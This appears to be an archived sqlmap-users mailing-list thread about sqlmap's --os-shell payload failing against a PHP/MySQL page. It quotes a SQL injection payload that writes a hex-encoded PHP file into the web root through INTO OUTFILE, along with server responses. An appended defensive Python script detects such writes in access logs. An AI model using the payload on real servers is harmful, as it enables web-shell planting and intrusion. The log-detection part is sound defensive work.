Re: [sqlmap-users] the default --os-shell payload could not upload
From: Miroslav S. <mir...@gm...> - 2012-12-17 12:26:10
Undefined index (while used for sure) is a sign of dropped parameters, almost always in cases of long payloads.

Kind regards,
Miroslav Stampar

On Dec 17, 2012 1:21 PM, "li" <li...@gm...> wrote:
> Hello there,
>
> I just get a problem when I use the --os-shell command. English is not my mother language, but I will try my best to explain the situation.
>
> When I use the default --os-shell payload, it does not work. The server response is
>
> > HTTP/1.1 200 OK
> > Date: Mon, 17 Dec 2012 11:42:34 GMT
> > Server: Apache/2.2.16 (Debian)
> > X-Powered-By: PHP/5.3.3-7+squeeze14
> > Vary: Accept-Encoding
> > Content-Length: 1858
> > Content-Type: text/html
>
> and an error message in the page:
>
> > Notice: Undefined index: id in /var/www/cat.php on line 6
>
> The 6th line in my cat.php is:
>
> > <?php
> > require "header.php";
> > $pics = Picture::all($_GET["id"]); // the sixth line
>
> But if I shorten the payload, just like
>
> > 1%20LIMIT%201%20INTO%20OUTFILE%20'/var/www/tmpuyvgq.php'%20LINES%20TERMINATED%20BY%200x3c3f7068700a696620286973737d3f3e0a%20--
>
> this payload would work. The file is written, and the server response:
>
> > Mon, 17 Dec 2012 12:02:17 GMT
> > Server: Apache/2.2.16 (Debian)
> > X-Powered-By: PHP/5.3.3-7+squeeze14
> > Vary: Accept-Encoding
> > Content-Length: 1211
> > Content-Type: text/html
>
> also with an error message:
>
> > Warning: mysql_fetch_assoc() expects parameter 1 to be resource, boolean given in /var/www/classes/picture.php on line 22
>
> I thought maybe the length of the URL is too long. Maybe there is some error in my PHP conf. But I thought the default should work on all kinds of situations. I could not figure out the problem.
>
> Thanks everyone.
>
> By the way, I could not receive the mailing list content. I don't know if you can receive this email.
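For defenders, a request like the one quoted in the message above leaves a recognisable trace in web server access logs. The following is an added example (not part of the original thread and not sqlmap code) that scans access-log lines for `INTO OUTFILE`/`DUMPFILE` writes and decodes the hex `LINES TERMINATED BY` value; the log framing, the client address and the script marker list are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# File-write clause as it appears in the thread's payload:
#   INTO OUTFILE '<path>' ... LINES TERMINATED BY 0x<hex>
WRITE_RE = re.compile(
    r"INTO\s+(?:OUTFILE|DUMPFILE)\s+'([^']+)'"
    r"(?:.*?LINES\s+TERMINATED\s+BY\s+0x([0-9a-f]+))?",
    re.IGNORECASE | re.DOTALL,
)
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<%")  # assumed marker list

def inspect_target(target):
    """Return a finding for one request target, or None if no file write."""
    m = WRITE_RE.search(unquote_plus(target))
    if not m:
        return None
    path, hex_body = m.groups()
    body = b""
    if hex_body and len(hex_body) % 2 == 0:
        body = bytes.fromhex(hex_body)  # terminator MySQL appends after each row
    return {
        "path": path,
        "body_bytes": len(body),
        "script": any(mark in body for mark in SCRIPT_MARKERS),
    }

def scan_log(lines):
    findings = []
    for n, line in enumerate(lines, 1):
        req = REQUEST_RE.search(line)
        finding = inspect_target(req.group(1)) if req else None
        if finding:
            findings.append({"line": n, **finding})
    return findings

# Constructed sample: payload copied from the thread, log framing invented.
PAYLOAD = ("1%20LIMIT%201%20INTO%20OUTFILE%20'/var/www/tmpuyvgq.php'"
           "%20LINES%20TERMINATED%20BY%200x3c3f7068700a696620286973737d3f3e0a%20--")
SAMPLE_LOG = [
    '192.0.2.10 - - [17/Dec/2012:12:02:16 +0000] "GET /cat.php?id=1 HTTP/1.1" 200 1858',
    '192.0.2.10 - - [17/Dec/2012:12:02:17 +0000] "GET /cat.php?id='
    + PAYLOAD + ' HTTP/1.1" 200 1211',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f)
```

A hit whose decoded terminator contains a script marker and whose path sits under the web root is worth correlating with new files on disk and with the MySQL account's FILE privilege.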